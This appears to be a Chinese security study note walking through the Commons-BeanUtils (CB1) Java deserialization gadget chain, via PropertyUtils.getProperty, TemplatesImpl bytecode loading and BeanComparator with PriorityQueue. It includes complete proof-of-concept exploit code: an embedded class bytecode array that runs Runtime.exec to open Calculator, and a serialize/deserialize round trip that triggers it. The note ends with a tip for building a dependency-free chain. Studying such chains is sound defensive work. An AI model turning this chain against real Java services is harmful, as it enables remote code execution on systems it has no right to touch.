CB基础知识

CB基础知识

简单整理一下CB的基础知识。

getProperty

getProperty是org.apache.commons.beanutils包提供的一个静态方法PropertyUtils.getProperty().他的构造函数的参数为Object bean, String name。

public static Object getProperty(Object bean, String name) throws IllegalAccessException, InvocationTargetException, NoSuchMethodException {
        return PropertyUtilsBean.getInstance().getProperty(bean, name);
    }

使用一下测试类来验证PropertyUtils.getProperty()的作用。

---

注意：

• javabean的getter的类型是T，不能是void。
• javabean的setter的类型是void。
• PropertyUtils.getProperty(Object bean, String name)，调用的name需要无参。（暂时这样理解，不确定是不是也可以构造有参的,后续有其他了解，再进行补充。）

---

import java.io.IOException;

/**
 * author: f19t
 * Date: 2023/2/27 14:35
 */
public class My_bean {
    private String name = "catalina";


    private My_bean() {
        System.out.println("无参构造");
    }

    public String getExec() throws IOException {
        Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
        return "";
    }
}

运行下方代码可成功弹计算机。

import org.apache.commons.beanutils.*;

import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;

/**
 * author: f19t
 * Date: 2023/2/27 14:20
 */
public class Test_commons_beanutils {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, ClassNotFoundException, InstantiationException {
        Class c1 = Class.forName("My_bean");
        Constructor ct1 = c1.getDeclaredConstructor();//不会初始化，无参构造
        ct1.setAccessible(true);
        Object obj = ct1.newInstance();//初始化执行
        PropertyUtils.getProperty(obj,"exec");
    }

}

TemplatesImpl

CB基础知识，这里为什么讲TemplatesImpl呢，因为TemplatesImpl里包含多个getter、setter，首先先介绍一下TemplatesImpl如何执行字节码吧。

---

• TemplatesImpl中的TransletClassLoader类，重写了defineClass方法，并且不是protected类型的,可以被外部调用.
• newTransformer可以调用到defineClass，导致执行字节码。（入口1）

defineClass:185, TemplatesImpl$TransletClassLoader (com.sun.org.apache.xalan.internal.xsltc.trax)
defineTransletClasses:414, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
getTransletInstance:451, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
main:106, Test_commons_beanutils (ysoserial)

测试代码

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.*;

import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;

import static ysoserial.payloads.util.Reflections.setFieldValue;

/**
 * author: f19t
 * Date: 2023/2/27 14:20
 */
public class Test_commons_beanutils {
    public static void main(String[] args) throws Exception {

        byte[] testClassBytes = new byte[]{-54 ,-2 ,-70 ,-66 ,0 ,0 ,0 ,52 ,0 ,47 ,10 ,0 ,9 ,0 ,22 ,
            10 ,0 ,23 ,0 ,24 ,8 ,0 ,25 ,10 ,0 ,23 ,0 ,26 ,9 ,0 ,
            27 ,0 ,28 ,8 ,0 ,29 ,10 ,0 ,30 ,0 ,31 ,7 ,0 ,32 ,7 ,
            0 ,33 ,1 ,0 ,9 ,116 ,114 ,97 ,110 ,115 ,102 ,111 ,114 ,109 ,1 ,
            0 ,114 ,40 ,76 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,
            47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,97 ,108 ,97 ,110 ,47 ,105 ,
            110 ,116 ,101 ,114 ,110 ,97 ,108 ,47 ,120 ,115 ,108 ,116 ,99 ,47 ,68 ,
            79 ,77 ,59 ,91 ,76 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,
            103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,109 ,108 ,47 ,105 ,110 ,
            116 ,101 ,114 ,110 ,97 ,108 ,47 ,115 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,
            101 ,114 ,47 ,83 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,97 ,116 ,105 ,111 ,
            110 ,72 ,97 ,110 ,100 ,108 ,101 ,114 ,59 ,41 ,86 ,1 ,0 ,4 ,67 ,
            111 ,100 ,101 ,1 ,0 ,15 ,76 ,105 ,110 ,101 ,78 ,117 ,109 ,98 ,101 ,
            114 ,84 ,97 ,98 ,108 ,101 ,1 ,0 ,10 ,69 ,120 ,99 ,101 ,112 ,116 ,
            105 ,111 ,110 ,115 ,7 ,0 ,34 ,1 ,0 ,-90 ,40 ,76 ,99 ,111 ,109 ,
            47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,
            47 ,120 ,97 ,108 ,97 ,110 ,47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,108 ,
            47 ,120 ,115 ,108 ,116 ,99 ,47 ,68 ,79 ,77 ,59 ,76 ,99 ,111 ,109 ,
            47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,
            47 ,120 ,109 ,108 ,47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,108 ,47 ,100 ,
            116 ,109 ,47 ,68 ,84 ,77 ,65 ,120 ,105 ,115 ,73 ,116 ,101 ,114 ,97 ,
            116 ,111 ,114 ,59 ,76 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,
            103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,109 ,108 ,47 ,105 ,110 ,
            116 ,101 ,114 ,110 ,97 ,108 ,47 ,115 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,
            101 ,114 ,47 ,83 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,97 ,116 ,105 ,111 ,
            110 ,72 ,97 ,110 ,100 ,108 ,101 ,114 ,59 ,41 ,86 ,1 ,0 ,6 ,60 ,
            105 ,110 ,105 ,116 ,62 ,1 ,0 ,3 ,40 ,41 ,86 ,7 ,0 ,35 ,1 ,
            0 ,10 ,83 ,111 ,117 ,114 ,99 ,101 ,70 ,105 ,108 ,101 ,1 ,0 ,23 ,
            72 ,101 ,108 ,108 ,111 ,84 ,101 ,109 ,112 ,108 ,97 ,116 ,101 ,115 ,73 ,
            109 ,112 ,108 ,46 ,106 ,97 ,118 ,97 ,12 ,0 ,17 ,0 ,18 ,7 ,0 ,
            36 ,12 ,0 ,37 ,0 ,38 ,1 ,0 ,40 ,111 ,112 ,101 ,110 ,32 ,47 ,
            83 ,121 ,115 ,116 ,101 ,109 ,47 ,65 ,112 ,112 ,108 ,105 ,99 ,97 ,116 ,
            105 ,111 ,110 ,115 ,47 ,67 ,97 ,108 ,99 ,117 ,108 ,97 ,116 ,111 ,114 ,
            46 ,97 ,112 ,112 ,12 ,0 ,39 ,0 ,40 ,7 ,0 ,41 ,12 ,0 ,42 ,
            0 ,43 ,1 ,0 ,19 ,72 ,101 ,108 ,108 ,111 ,32 ,84 ,101 ,109 ,112 ,
            108 ,97 ,116 ,101 ,115 ,73 ,109 ,112 ,108 ,7 ,0 ,44 ,12 ,0 ,45 ,
            0 ,46 ,1 ,0 ,28 ,121 ,115 ,111 ,115 ,101 ,114 ,105 ,97 ,108 ,47 ,
            72 ,101 ,108 ,108 ,111 ,84 ,101 ,109 ,112 ,108 ,97 ,116 ,101 ,115 ,73 ,
            109 ,112 ,108 ,1 ,0 ,64 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,
            114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,97 ,108 ,97 ,110 ,
            47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,108 ,47 ,120 ,115 ,108 ,116 ,99 ,
            47 ,114 ,117 ,110 ,116 ,105 ,109 ,101 ,47 ,65 ,98 ,115 ,116 ,114 ,97 ,
            99 ,116 ,84 ,114 ,97 ,110 ,115 ,108 ,101 ,116 ,1 ,0 ,57 ,99 ,111 ,
            109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,
            101 ,47 ,120 ,97 ,108 ,97 ,110 ,47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,
            108 ,47 ,120 ,115 ,108 ,116 ,99 ,47 ,84 ,114 ,97 ,110 ,115 ,108 ,101 ,
            116 ,69 ,120 ,99 ,101 ,112 ,116 ,105 ,111 ,110 ,1 ,0 ,19 ,106 ,97 ,
            118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,69 ,120 ,99 ,101 ,112 ,116 ,105 ,
            111 ,110 ,1 ,0 ,17 ,106 ,97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,
            82 ,117 ,110 ,116 ,105 ,109 ,101 ,1 ,0 ,10 ,103 ,101 ,116 ,82 ,117 ,
            110 ,116 ,105 ,109 ,101 ,1 ,0 ,21 ,40 ,41 ,76 ,106 ,97 ,118 ,97 ,
            47 ,108 ,97 ,110 ,103 ,47 ,82 ,117 ,110 ,116 ,105 ,109 ,101 ,59 ,1 ,
            0 ,4 ,101 ,120 ,101 ,99 ,1 ,0 ,39 ,40 ,76 ,106 ,97 ,118 ,97 ,
            47 ,108 ,97 ,110 ,103 ,47 ,83 ,116 ,114 ,105 ,110 ,103 ,59 ,41 ,76 ,
            106 ,97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,80 ,114 ,111 ,99 ,101 ,
            115 ,115 ,59 ,1 ,0 ,16 ,106 ,97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,
            47 ,83 ,121 ,115 ,116 ,101 ,109 ,1 ,0 ,3 ,111 ,117 ,116 ,1 ,0 ,
            21 ,76 ,106 ,97 ,118 ,97 ,47 ,105 ,111 ,47 ,80 ,114 ,105 ,110 ,116 ,
            83 ,116 ,114 ,101 ,97 ,109 ,59 ,1 ,0 ,19 ,106 ,97 ,118 ,97 ,47 ,
            105 ,111 ,47 ,80 ,114 ,105 ,110 ,116 ,83 ,116 ,114 ,101 ,97 ,109 ,1 ,
            0 ,7 ,112 ,114 ,105 ,110 ,116 ,108 ,110 ,1 ,0 ,21 ,40 ,76 ,106 ,
            97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,83 ,116 ,114 ,105 ,110 ,103 ,
            59 ,41 ,86 ,0 ,33 ,0 ,8 ,0 ,9 ,0 ,0 ,0 ,0 ,0 ,3 ,
            0 ,1 ,0 ,10 ,0 ,11 ,0 ,2 ,0 ,12 ,0 ,0 ,0 ,25 ,0 ,
            0 ,0 ,3 ,0 ,0 ,0 ,1 ,-79 ,0 ,0 ,0 ,1 ,0 ,13 ,0 ,
            0 ,0 ,6 ,0 ,1 ,0 ,0 ,0 ,14 ,0 ,14 ,0 ,0 ,0 ,4 ,
            0 ,1 ,0 ,15 ,0 ,1 ,0 ,10 ,0 ,16 ,0 ,2 ,0 ,12 ,0 ,
            0 ,0 ,25 ,0 ,0 ,0 ,4 ,0 ,0 ,0 ,1 ,-79 ,0 ,0 ,0 ,
            1 ,0 ,13 ,0 ,0 ,0 ,6 ,0 ,1 ,0 ,0 ,0 ,16 ,0 ,14 ,
            0 ,0 ,0 ,4 ,0 ,1 ,0 ,15 ,0 ,1 ,0 ,17 ,0 ,18 ,0 ,
            2 ,0 ,12 ,0 ,0 ,0 ,58 ,0 ,2 ,0 ,2 ,0 ,0 ,0 ,22 ,
            42 ,-73 ,0 ,1 ,-72 ,0 ,2 ,18 ,3 ,-74 ,0 ,4 ,76 ,-78 ,0 ,
            5 ,18 ,6 ,-74 ,0 ,7 ,-79 ,0 ,0 ,0 ,1 ,0 ,13 ,0 ,0 ,
            0 ,18 ,0 ,4 ,0 ,0 ,0 ,18 ,0 ,4 ,0 ,19 ,0 ,13 ,0 ,
            20 ,0 ,21 ,0 ,21 ,0 ,14 ,0 ,0 ,0 ,4 ,0 ,1 ,0 ,19 ,
            0 ,1 ,0 ,20 ,0 ,0 ,0 ,2 ,0 ,21 ,};

        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{testClassBytes});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        obj.newTransformer();

    }


}

其中HelloTemplatesImpl代码为：

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class
HelloTemplatesImpl extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers)
throws TransletException {}
    public void transform(DOM document, DTMAxisIterator iterator,
SerializationHandler handler) throws TransletException {}
    public HelloTemplatesImpl() throws Exception {
        super();
        Process p = Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
        System.out.println("Hello TemplatesImpl");
    }
}

• 其getOutputProperties调用了newTransformer，进而导致字节码被执行。(入口2)

defineClass:185, TemplatesImpl$TransletClassLoader (com.sun.org.apache.xalan.internal.xsltc.trax)
defineTransletClasses:414, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
getTransletInstance:451, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
main:101, Test_commons_beanutils (ysoserial)

测试代码

obj.getOutputProperties();//下断点

又因为getOutputProperties符合javabeen的小驼峰式命名法规则，并且返回类型不是void，所以我们可以通过PropertyUtils.getProperty进行调用。代码如下。

PropertyUtils.getProperty(obj,"OutputProperties");

BeanComparator

BeanComparator位于org.apache.commons.beanutils包内，其compare会调用PropertyUtils.getProperty，这就和上面的命令执行连接起来了，我们做个简单测试。
其构造函数

public BeanComparator(String property, Comparator<?> comparator) {
        this.setProperty(property);
        if (comparator != null) {
            this.comparator = comparator;
        } else {
            this.comparator = ComparableComparator.getInstance();
        }

    }

其compare方法

public int compare(T o1, T o2) {
        if (this.property == null) {
            return this.internalCompare(o1, o2);
        } else {
            try {
                Object value1 = PropertyUtils.getProperty(o1, this.property);
                Object value2 = PropertyUtils.getProperty(o2, this.property);
                return this.internalCompare(value1, value2);
            } catch (IllegalAccessException var5) {
                throw new RuntimeException("IllegalAccessException: " + var5.toString());
            } catch (InvocationTargetException var6) {
                throw new RuntimeException("InvocationTargetException: " + var6.toString());
            } catch (NoSuchMethodException var7) {
                throw new RuntimeException("NoSuchMethodException: " + var7.toString());
            }
        }
    }

我们学习了CC4的基础知识，假设compare(T o1, T o2)两个参数是PriorityQueue传过来的，那么在PriorityQueue中

queue[i] = s.readObject();//PriorityQueue.readObject
heapify();//调用点,PriorityQueue.readObject

//siftDownUsingComparator又调用了，集合的compare方法。
private void siftDownUsingComparator(int k, E x) {
        int half = size >>> 1;
        while (k < half) {
            int child = (k << 1) + 1;
            Object c = queue[child];
            int right = child + 1;
            if (right < size &&
                comparator.compare((E) c, (E) queue[right]) > 0)//双参数传入compare
                c = queue[child = right];
            if (comparator.compare(x, (E) c) <= 0)
                break;
            queue[k] = c;
            k = child;
        }
        queue[k] = x;
    }

我们先看利用代码

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.*;

import org.apache.commons.beanutils.BeanComparator;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.PriorityQueue;

import static ysoserial.payloads.util.Reflections.setFieldValue;

/**
 * author: f19t
 * Date: 2023/2/27 14:20
 */
public class Test_commons_beanutils {
    public static void main(String[] args) throws Exception {

        byte[] testClassBytes = new byte[]{-54 ,-2 ,-70 ,-66 ,0 ,0 ,0 ,52 ,0 ,47 ,10 ,0 ,9 ,0 ,22 ,
            10 ,0 ,23 ,0 ,24 ,8 ,0 ,25 ,10 ,0 ,23 ,0 ,26 ,9 ,0 ,
            27 ,0 ,28 ,8 ,0 ,29 ,10 ,0 ,30 ,0 ,31 ,7 ,0 ,32 ,7 ,
            0 ,33 ,1 ,0 ,9 ,116 ,114 ,97 ,110 ,115 ,102 ,111 ,114 ,109 ,1 ,
            0 ,114 ,40 ,76 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,
            47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,97 ,108 ,97 ,110 ,47 ,105 ,
            110 ,116 ,101 ,114 ,110 ,97 ,108 ,47 ,120 ,115 ,108 ,116 ,99 ,47 ,68 ,
            79 ,77 ,59 ,91 ,76 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,
            103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,109 ,108 ,47 ,105 ,110 ,
            116 ,101 ,114 ,110 ,97 ,108 ,47 ,115 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,
            101 ,114 ,47 ,83 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,97 ,116 ,105 ,111 ,
            110 ,72 ,97 ,110 ,100 ,108 ,101 ,114 ,59 ,41 ,86 ,1 ,0 ,4 ,67 ,
            111 ,100 ,101 ,1 ,0 ,15 ,76 ,105 ,110 ,101 ,78 ,117 ,109 ,98 ,101 ,
            114 ,84 ,97 ,98 ,108 ,101 ,1 ,0 ,10 ,69 ,120 ,99 ,101 ,112 ,116 ,
            105 ,111 ,110 ,115 ,7 ,0 ,34 ,1 ,0 ,-90 ,40 ,76 ,99 ,111 ,109 ,
            47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,
            47 ,120 ,97 ,108 ,97 ,110 ,47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,108 ,
            47 ,120 ,115 ,108 ,116 ,99 ,47 ,68 ,79 ,77 ,59 ,76 ,99 ,111 ,109 ,
            47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,
            47 ,120 ,109 ,108 ,47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,108 ,47 ,100 ,
            116 ,109 ,47 ,68 ,84 ,77 ,65 ,120 ,105 ,115 ,73 ,116 ,101 ,114 ,97 ,
            116 ,111 ,114 ,59 ,76 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,
            103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,109 ,108 ,47 ,105 ,110 ,
            116 ,101 ,114 ,110 ,97 ,108 ,47 ,115 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,
            101 ,114 ,47 ,83 ,101 ,114 ,105 ,97 ,108 ,105 ,122 ,97 ,116 ,105 ,111 ,
            110 ,72 ,97 ,110 ,100 ,108 ,101 ,114 ,59 ,41 ,86 ,1 ,0 ,6 ,60 ,
            105 ,110 ,105 ,116 ,62 ,1 ,0 ,3 ,40 ,41 ,86 ,7 ,0 ,35 ,1 ,
            0 ,10 ,83 ,111 ,117 ,114 ,99 ,101 ,70 ,105 ,108 ,101 ,1 ,0 ,23 ,
            72 ,101 ,108 ,108 ,111 ,84 ,101 ,109 ,112 ,108 ,97 ,116 ,101 ,115 ,73 ,
            109 ,112 ,108 ,46 ,106 ,97 ,118 ,97 ,12 ,0 ,17 ,0 ,18 ,7 ,0 ,
            36 ,12 ,0 ,37 ,0 ,38 ,1 ,0 ,40 ,111 ,112 ,101 ,110 ,32 ,47 ,
            83 ,121 ,115 ,116 ,101 ,109 ,47 ,65 ,112 ,112 ,108 ,105 ,99 ,97 ,116 ,
            105 ,111 ,110 ,115 ,47 ,67 ,97 ,108 ,99 ,117 ,108 ,97 ,116 ,111 ,114 ,
            46 ,97 ,112 ,112 ,12 ,0 ,39 ,0 ,40 ,7 ,0 ,41 ,12 ,0 ,42 ,
            0 ,43 ,1 ,0 ,19 ,72 ,101 ,108 ,108 ,111 ,32 ,84 ,101 ,109 ,112 ,
            108 ,97 ,116 ,101 ,115 ,73 ,109 ,112 ,108 ,7 ,0 ,44 ,12 ,0 ,45 ,
            0 ,46 ,1 ,0 ,28 ,121 ,115 ,111 ,115 ,101 ,114 ,105 ,97 ,108 ,47 ,
            72 ,101 ,108 ,108 ,111 ,84 ,101 ,109 ,112 ,108 ,97 ,116 ,101 ,115 ,73 ,
            109 ,112 ,108 ,1 ,0 ,64 ,99 ,111 ,109 ,47 ,115 ,117 ,110 ,47 ,111 ,
            114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,101 ,47 ,120 ,97 ,108 ,97 ,110 ,
            47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,108 ,47 ,120 ,115 ,108 ,116 ,99 ,
            47 ,114 ,117 ,110 ,116 ,105 ,109 ,101 ,47 ,65 ,98 ,115 ,116 ,114 ,97 ,
            99 ,116 ,84 ,114 ,97 ,110 ,115 ,108 ,101 ,116 ,1 ,0 ,57 ,99 ,111 ,
            109 ,47 ,115 ,117 ,110 ,47 ,111 ,114 ,103 ,47 ,97 ,112 ,97 ,99 ,104 ,
            101 ,47 ,120 ,97 ,108 ,97 ,110 ,47 ,105 ,110 ,116 ,101 ,114 ,110 ,97 ,
            108 ,47 ,120 ,115 ,108 ,116 ,99 ,47 ,84 ,114 ,97 ,110 ,115 ,108 ,101 ,
            116 ,69 ,120 ,99 ,101 ,112 ,116 ,105 ,111 ,110 ,1 ,0 ,19 ,106 ,97 ,
            118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,69 ,120 ,99 ,101 ,112 ,116 ,105 ,
            111 ,110 ,1 ,0 ,17 ,106 ,97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,
            82 ,117 ,110 ,116 ,105 ,109 ,101 ,1 ,0 ,10 ,103 ,101 ,116 ,82 ,117 ,
            110 ,116 ,105 ,109 ,101 ,1 ,0 ,21 ,40 ,41 ,76 ,106 ,97 ,118 ,97 ,
            47 ,108 ,97 ,110 ,103 ,47 ,82 ,117 ,110 ,116 ,105 ,109 ,101 ,59 ,1 ,
            0 ,4 ,101 ,120 ,101 ,99 ,1 ,0 ,39 ,40 ,76 ,106 ,97 ,118 ,97 ,
            47 ,108 ,97 ,110 ,103 ,47 ,83 ,116 ,114 ,105 ,110 ,103 ,59 ,41 ,76 ,
            106 ,97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,80 ,114 ,111 ,99 ,101 ,
            115 ,115 ,59 ,1 ,0 ,16 ,106 ,97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,
            47 ,83 ,121 ,115 ,116 ,101 ,109 ,1 ,0 ,3 ,111 ,117 ,116 ,1 ,0 ,
            21 ,76 ,106 ,97 ,118 ,97 ,47 ,105 ,111 ,47 ,80 ,114 ,105 ,110 ,116 ,
            83 ,116 ,114 ,101 ,97 ,109 ,59 ,1 ,0 ,19 ,106 ,97 ,118 ,97 ,47 ,
            105 ,111 ,47 ,80 ,114 ,105 ,110 ,116 ,83 ,116 ,114 ,101 ,97 ,109 ,1 ,
            0 ,7 ,112 ,114 ,105 ,110 ,116 ,108 ,110 ,1 ,0 ,21 ,40 ,76 ,106 ,
            97 ,118 ,97 ,47 ,108 ,97 ,110 ,103 ,47 ,83 ,116 ,114 ,105 ,110 ,103 ,
            59 ,41 ,86 ,0 ,33 ,0 ,8 ,0 ,9 ,0 ,0 ,0 ,0 ,0 ,3 ,
            0 ,1 ,0 ,10 ,0 ,11 ,0 ,2 ,0 ,12 ,0 ,0 ,0 ,25 ,0 ,
            0 ,0 ,3 ,0 ,0 ,0 ,1 ,-79 ,0 ,0 ,0 ,1 ,0 ,13 ,0 ,
            0 ,0 ,6 ,0 ,1 ,0 ,0 ,0 ,14 ,0 ,14 ,0 ,0 ,0 ,4 ,
            0 ,1 ,0 ,15 ,0 ,1 ,0 ,10 ,0 ,16 ,0 ,2 ,0 ,12 ,0 ,
            0 ,0 ,25 ,0 ,0 ,0 ,4 ,0 ,0 ,0 ,1 ,-79 ,0 ,0 ,0 ,
            1 ,0 ,13 ,0 ,0 ,0 ,6 ,0 ,1 ,0 ,0 ,0 ,16 ,0 ,14 ,
            0 ,0 ,0 ,4 ,0 ,1 ,0 ,15 ,0 ,1 ,0 ,17 ,0 ,18 ,0 ,
            2 ,0 ,12 ,0 ,0 ,0 ,58 ,0 ,2 ,0 ,2 ,0 ,0 ,0 ,22 ,
            42 ,-73 ,0 ,1 ,-72 ,0 ,2 ,18 ,3 ,-74 ,0 ,4 ,76 ,-78 ,0 ,
            5 ,18 ,6 ,-74 ,0 ,7 ,-79 ,0 ,0 ,0 ,1 ,0 ,13 ,0 ,0 ,
            0 ,18 ,0 ,4 ,0 ,0 ,0 ,18 ,0 ,4 ,0 ,19 ,0 ,13 ,0 ,
            20 ,0 ,21 ,0 ,21 ,0 ,14 ,0 ,0 ,0 ,4 ,0 ,1 ,0 ,19 ,
            0 ,1 ,0 ,20 ,0 ,0 ,0 ,2 ,0 ,21 ,};

        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{testClassBytes});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
//        PropertyUtils.getProperty(obj,"getOutputProperties");

//        obj.getOutputProperties();

        BeanComparator beanComparator = new BeanComparator();//为空，否则add时会调用getter方法。
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(3, beanComparator);
        queue.add(1);
        queue.add(1);
        
        setFieldValue(beanComparator, "property", "outputProperties");//替换为执行字节码的getter
        setFieldValue(queue,"queue",new Object[]{obj,1});//必须，不替换queue为数字，无法调用outputProperties

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();


    }
}

无依赖CB1链

因为BeanComparator的构造函数说明，如果没有指定Comparator，那么默认使用ComparableComparator.getInstance()。

public BeanComparator(String property) {
        this(property, ComparableComparator.getInstance());
    }

    public BeanComparator(String property, Comparator<?> comparator) {
        this.setProperty(property);
        if (comparator != null) {
            this.comparator = comparator;
        } else {
            this.comparator = ComparableComparator.getInstance();
        }

    }

所有构造无依赖CC的CB1链只需要在构造BeanComparator指定一个java自带的Comparator即可。